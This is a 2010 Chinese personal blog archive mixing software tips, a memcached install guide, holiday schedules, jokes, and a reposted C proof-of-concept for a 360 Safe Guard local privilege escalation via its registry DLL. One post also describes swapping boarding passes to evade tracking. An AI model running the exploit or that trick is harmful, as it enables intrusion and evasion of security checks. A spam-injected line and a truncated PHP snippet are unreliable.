Archive for 二月, 2010

vs2008几个诡异的事情

星期六, 二月 27th, 2010

1.vs2008无法卸载
在程序管理器中卸载2008老提示卸载失败,用360也不行,后百度得知,是vs2008的那些update作祟,在程序管理器中找到这些更新,卸载之,果然可以卸载2008了。

2.vs2008无法编译
一个非常简单正常的程序,编译时都提示
“vs2008编译错误fatal error C1902: 程序数据库管理器不匹配;请检查安装解决。”
后百度得知,是pdb相关的dll的版本冲突
解决方法:
到C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE下面拷贝mspdbsrv.exe mspdb80.dll mspdbcore.dll 到C:\Program Files\Microsoft Visual Studio 9.0\VC\bin下面,重启VS即可。

memcache 和 php支持安装

星期五, 二月 26th, 2010

memcache是个很方便的东东,可以支持数据的频繁读写,效率比数据库要快,memcache的官方地址是http://memcached.org/

一、安装libevent支持

cd /usr/local/src/我习惯将代码文件放这里,整洁些
wget http://www.monkey.org/~provos/libevent-1.2.tar.gz
tar xzvf libevent-1.2.tar.gz
cd libevent-1.2
./configure –prefix=/usr
make&&make install

二、安装memcached
wget http://memcached.googlecode.com/files/memcached-1.4.4.tar.gz
tar xzvf memcached-1.4.4.tar.gz
cd memcached-1.4.4
./configure –with-libevent=/usr
make
make install

三、安装memcache的php支持
wget http://pecl.php.net/get/memcache-2.2.5.tgz
tar xzvf memcache-2.2.5.tgz
cd memcache-2.2.5
phpize
./configure
make
make install
#此时会提示你so文件安装在/usr/local/lib/php/extensions/no-debug-non-zts-20090626/下
cp /usr/local/lib/php/extensions/no-debug-non-zts-20090626/memcache.so /usr/lib/php/modules/
注意,/usr/lib/php/modules/是值php.ini中默认的extension_dir所指,因机器而异
vi /etc/php.ini
打开php金牌娱乐官方网站文件,将下面的文本加到末尾
extension=memcache.so
[Memcache]
memcache.allow_failover = On
memcache.max_failover_attempts = 20
memcache.chunk_size = 8192
memcache.default_port = 11211
;memcache.hash_strategy = “standard”
;memcache.hash_function = “crc32”
此时重启apache看phpinfo就可看到memcache具体条目

四、启动memcached服务
/usr/local/bin/memcached -d -m 10 -u nobody -l 127.0.0.1 -p 12000 -c 256 -P /tmp/memcached.pid
最好将这句话加到 /etc/rc.local 中
-d选项是启动一个守护进程,
-m是分配给Memcache使用的内存数量,单位是MB,我这里是10MB,
-u是运行Memcache的用户,为了安全,nobody即可
-l是监听的服务器IP地址,如果有多个地址的话,我这里指定了服务器的回环地址,
-p是设置Memcache监听的端口,我这里设置了12000,最好是1024以上的端口,
-c选项是最大运行的并发连接数,默认是1024,我这里设置了256,按照你服务器的负载量来设定,
-P是设置保存Memcache的pid文件,我这里是保存在 /tmp/memcached.pid,

五、测试文件
connect(“127.0.0.1”, 12000);
$mem->set(‘key’, ‘Welcom to shallwe.net !’, 0, 60);
$val = $mem->get(‘key’);
echo $val;
?>
将这段文本放到test.php中,执行php test.php,应该会出现welcom to shallwe.net !

国务院公布2010年放假安排

星期二, 二月 23rd, 2010

纯属转载,对其真实性拒绝负责,谢绝跨省跨市以及跨村等一切追捕。

2010年主要节日的放假安排如下:

元旦:1月1日至3日放假,共3天,无调休。

春节:2月13日至19日放假调休,共7天。2月20日(星期六)、21日(星期日)上班。

清明节:4月3日至5日放假,共3天,无调休。

劳动节:5月1日至3日放假,共3天,无调休。

端午节:6月14日至16日放假调休,共3天。6月12日(星期六)、13日(星期日)上班。

中秋节:9月22日至24日放假调休,共3天。9月19日(星期日)、25日(星期六)上班。

国庆节:10月1日至7日放假调休,共7天。9月26日(星期日)、10月9日(星期六)上班。

据悉,明年的放假安排是根据《国务院关于修改〈全国年节及纪念日放假办法〉的决定》做出。和今年国庆中秋连耍8天不同,在调休安排上,看上去非常“中规中矩”,元旦、春节、清明节、劳动节、端午节、中秋节和国庆节7个节假日,没有一个是在时间上重合,分别分布在1月、2月、4月、5月、6月、9月、10月。且调休比较少(今年7个节假日都有调休),有3个节假日为放假公休,如元旦正好是周五,加周六周日共耍3天;清明为周一,加前面的周六周日共耍3天。

此外,中秋节假期结束距离国庆节为6天,相隔较近。

春节大假2010年2月19日结束后,2月20日(星期六)、2月21日(星期日)都要上班。也就是说,一收假就要连续上7天班。另外,在端午节放假前,也需连续上7天班。

两个现实的漏洞

星期六, 二月 20th, 2010

机场检查漏洞
等飞机的时候,第一道安检的时候检查身份证和登机牌,加入候机厅之后再上飞机的时候是不检验身份证的。这时如果有A买了机票去盐城,B买机票去深圳,AB分别安检加入候机厅后对调机票上机,B就会飞到盐城,A会飞到深圳。这个漏洞似乎用处不大,可以用来迷惑和摆脱某些追踪。

自助火锅店的漏洞:
昨天在一家自助火锅店吃饭,发现店里面居然没有卫生间,因为人吃火锅总得上厕所,所以人可以随便出入火锅店,这时我想如果有两个人,一个人在里面吃一会,中途尿遁出来,换另外一个人进去继续吃,店员是无法检测到这种换人漏洞的。自助饭店应该是很在乎这种漏洞的,之前在巴西烤肉的时候就发现付完钱之后不让人出去,不给你换人的任何机会。要解决这种漏洞,似乎也只有店家自备卫生间了。

又一个古诗串联(zz)

星期六, 二月 20th, 2010

商女不知亡国恨,隔江犹唱双截棍 (。。。。)

一朝被蛇咬,处处闻啼鸟 (这个比较无敌)

天苍苍,野茫茫,一树梨花压海棠 (震撼了 )

问君能有几多愁,困了累了喝红牛 (李煜内牛满面)

醒时同交欢,儿女忽成行 (这个太牛逼了。。)

但使龙城飞将在,六宫粉黛无颜色 (。。将军国色也~~~)

后宫佳丽三千人,铁杵也能磨成针 (这个有点三俗,慎入)

垂死病中惊坐起,一枝红杏出墙来

少小离家老大回,安能辨我是雄雌

春宵一刻值千金,千金散尽还复来

但使龙城飞将在,君王从此不早朝 (断什么山。。)

人生自古谁无死,春宵一刻值千金。有约不来过夜半,长使英雄泪满襟。

后宫佳丽三千人,不及汪伦送我情。

红军不怕远征难,千里江陵一日还。 春风又绿江南岸,夜半钟声到客船。 (千古奇事)

遥想公谨当年,小乔初嫁了,使我不得开心颜

我劝天公重抖擞,天公抖掉一只手

穷则独善其身,富则妻妾成群

洞边日出溪边雨,道士无情雀有情。

洞房花烛夜 无忘告乃翁

洛阳亲友如相问,就说我在黄鹤楼

桃花滩水深千尺,古人大便不用纸

江山如画皮,人生如梦遗 (18岁以下屏蔽此条)

大风起兮云飞扬 ,一生至爱阿迪王

好雨知时节 ,走路会湿鞋

老夫聊发少年狂,青春作伴好还乡

不识庐山真面目,只识弯弓射大雕 (老毛内牛满面)

在天愿作比翼鸟,大难临头各自飞

一枝红杏出墙来,老少爷们尽开怀 (这个无敌了)

2010春晚节目单-zz from 百合

星期二, 二月 2nd, 2010

1.开场歌舞《虎跃龙腾贺春来》

2.群口相声《和谁说相声》演员:姜昆、戴志诚、赵津生

3.歌舞《让我们舞起来》演员:宋祖英

4.儿童魔幻剧《玩具店之夜》

5.小品《一句话的事儿》演员:郭冬临、牛莉

串场节目:倒背百家姓王仙妮

6.歌曲《龙文》演员:谭晶、陈奕迅

7.歌曲《相亲相爱》演员:容祖儿、孙楠、王力宏等

8.相声剧《不能让他走》演员:冯巩、闫学晶、韩雪等

串场节目:猜象棋周奇明

9.武术舞蹈《对弈》演员:王亚彬等

10.歌曲《传奇》演员:王菲

11.小品《我心飞翔》演员:殷桃、闫妮、刘敏、柴权、刘思言、陈维涵

串场节目:道德模范海地英雄家属

12.歌曲《祖国万岁》演员:韩磊等

13.民族歌舞大串联《美好家园》《壮乡梅》《我和草原有个约会》《卓玛》《妹妹的山丹
花儿开》《党的政策亚克西》

14.近景魔术演员:刘谦

15.歌曲联唱:《一亩田》、《婚礼上的歌》、《幸福的两口子》演员:汤潮、庞龙、吕薇

16.小品《家有毕业生》演员:蔡明、郭达等

17.杂技《大蹬人》

18.歌曲《拍拍拍》演员:蔡国庆、解小东等

19.小品《两毛一脚》演员:黄宏、巩汉林

20.舞蹈《美好2010》

串场节目:上海世博会

21.小品《五十块钱》演员:周锦堂、尹北琛等

22.少数民族舞蹈《跳春》

23.戏曲《红楼赞花》演员:袁慧琴、于魁智等

24.歌曲《阳光路上》演员:阎维文

25.小品《捐款》演员:赵本山、王小利、孙丽荣、苏小龙

26.歌曲串烧《爱》《蝴蝶飞》《青苹果乐园》演员:小虎队

27.经典老歌集锦《我们和祖国一起长大》《让我们荡起双桨》《快乐的节日》《春天在哪
里》《在灿烂阳光下》演员:李谷一、蒋大为、胡松华、屠洪刚、刘和刚等

28.歌曲《走向复兴》演员:戴玉强、殷秀梅

零点敲钟

29.歌曲《盛世欢歌》

30.歌曲《幸福》演员:张也等

31.相声《论捧逗》演员:贾玲、白凯南

32.歌舞《歌舞青春——我要红》

33.舞蹈《荷塘莲雨》

34.相声《超级大卖场》演员:李伟建、武宾

35.歌组合《彩云之南》《姑娘我爱你》《天蓝蓝》

36.舞蹈《春天的芭蕾》

37.结束曲《难忘今宵》

内牛满面,今天是个值得纪念的日子

星期二, 二月 2nd, 2010

两年半了,不容易啊!!

瑞星公布的360本地提权漏洞利用代码

星期二, 二月 2nd, 2010

瑞星上已经被和谐了,在本地留个拷贝,完全没有别的啥意思。
360是个牛逼的公司,市场份额到了这么大分上,安装老邹的说法,也快算是个伟大的公司了,这是个技术实力和推广团队以及带队老大都十分顶尖的公司,在这上面还是很佩服。
只是这么大公司仍然会做些小动作,让人反感的同时,也会让互联网其他企业缺乏安全感,试想一下,如果哪天暴风或者千千静听被人爆出漏洞,360号召或者代替用户选择卸载这软件,会产生多大的杀伤力!!

zz开始,下面的poc我没测试

摘要:2月1日,有网友在百度知道搜索发现,奇虎360安全卫士存在本地提权漏洞,经瑞星互联网攻防实验室验证确认,该漏洞确实存在,并影响360安全卫士全部版本。

#include

typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_DELETE_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath “Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe”

#define TestDeleteKey HKEY_LOCAL_MACHINE
#define TestDeleteRegPath “Software\\360Safe\\Update”

#define TestSetKey HKEY_LOCAL_MACHINE
#define TestSetPath “Software\\360Safe”

BOOL InitBRegDll()
{
LONG lResult;
HKEY hKey;

CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;

lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;

DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, “Path”, NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
return FALSE;

strcat(cPath, “\\deepscan\\BREGDLL.dll”);

HMODULE modBReg = LoadLibraryA(cPath);
if (!modBReg)
return FALSE;

INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, “InitRegEngine”);
BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, “BRegDeleteKey”);
BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, “BRegOpenKey”);
BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, “BRegCloseKey”);
BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, “BRegSetValueEx”);

if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
FreeLibrary(modBReg);
return FALSE;
}

if (!InitRegEngine()) {
FreeLibrary(modBReg);
return FALSE;
}

return TRUE;
}

LONG TestSetRegKey()
{
HKEY hKey;
LONG lResult;

lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
if (FAILED(lResult))
return lResult;

DWORD dwType = REG_SZ;
static char szData[] = “TEST VALUE”;
lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
BRegCloseKey(hKey);

return lResult;
}

int main(int argc, char *argv[])
{
if (!InitBRegDll()) {
MessageBoxA(NULL, “初始化BReg失败!”, “失败”, MB_ICONSTOP);
return 1;
}

if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
MessageBoxA(NULL, “键值删除失败!”, “失败”, MB_ICONSTOP);
return 2;
}

if (FAILED(TestSetRegKey())) {
MessageBoxA(NULL, “设置键值失败!”, “失败”, MB_ICONSTOP);
return 3;
}

MessageBoxA(NULL, “突破系统安全检查,获得最高权限,漏洞利用成功!”, “成功”, MB_OK);
return 0;
}